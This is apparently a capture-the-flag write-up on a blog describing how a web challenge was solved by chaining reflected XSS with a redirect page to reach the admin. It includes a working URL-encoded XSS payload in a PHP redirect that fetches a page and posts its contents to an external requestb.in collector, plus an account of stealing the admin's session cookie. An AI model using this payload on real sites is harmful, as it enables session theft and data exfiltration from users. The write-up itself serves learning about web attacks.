Challenge:
No description
http://47.88.218.105:20010/
The login form!, we create an account and login to it, the challenge begin!
Obviously, we will click get flag, but it require us as admin. There is some clearly point for us to attack: “personal website”
So, we need to create a xss somewhere, and trick admin access to it.
After surfing, i see something good:
Change “getInfo” to some random random char, its printback, so how about a XSS payload?
Great!
So construct a redirect payload with cookie, send it to admin to steal his cookie solved the challenge? Nope!
The length is limit by 50 chars, we cant send it directly!
It’s SSRF TIMEEEEEE!
The idea is, create our php page which redirect whoever visit to the XSS page above!
i create index.php at /var/www/html/tsu/ like this
<?php header("Location: http://47.88.218.105:20010/action.php?callback=%3Cscript%20src%3D%22https%3A%2f%2fajax.googleapis.com%2fajax%2flibs%2fjquery%2f2.1.3%2fjquery.min.js%22%3E%3C%2fscript%3E%3Cscript%3E%20%24.get%28%27%2floged.php%27%2Cfunction%28data%29%7B%24.post%28%27https%3A%2f%2frequestb.in%2fr0uyoer0%3Finsp%3D%27%2C%7Bname%3Adata%7D%29%3B%7D%29%3B%20%3C%2fscript%3E");
Send my host to admin: https://meepwn.team/tsu/
wait some sec, and got it! the PHPSESSID of admin, but… we need “username” cookie to make us admin. Unfortunately, the http only flag is on so we cant steal it.
The only way to get flag is, trick admin click get flag himself and send flag back to us. It means we have to got csrf token, and do an request to make it real.
I’m not practice deep much with XSS, so this stage will bother me. Luckily, i got a very good xss in action teammate @quynhnhu
and he did it well, here the script:
https://pastebin.com/TqdGcYjP
we got flag!
Tsu BlogS ٩(^‿^)۶ 
Btw it’s not SSRF, it’s CSRF, you’ve forced the admin to re-locate his browser not server.
LikeLiked by 1 person
Thank you, my mistake 😀
LikeLike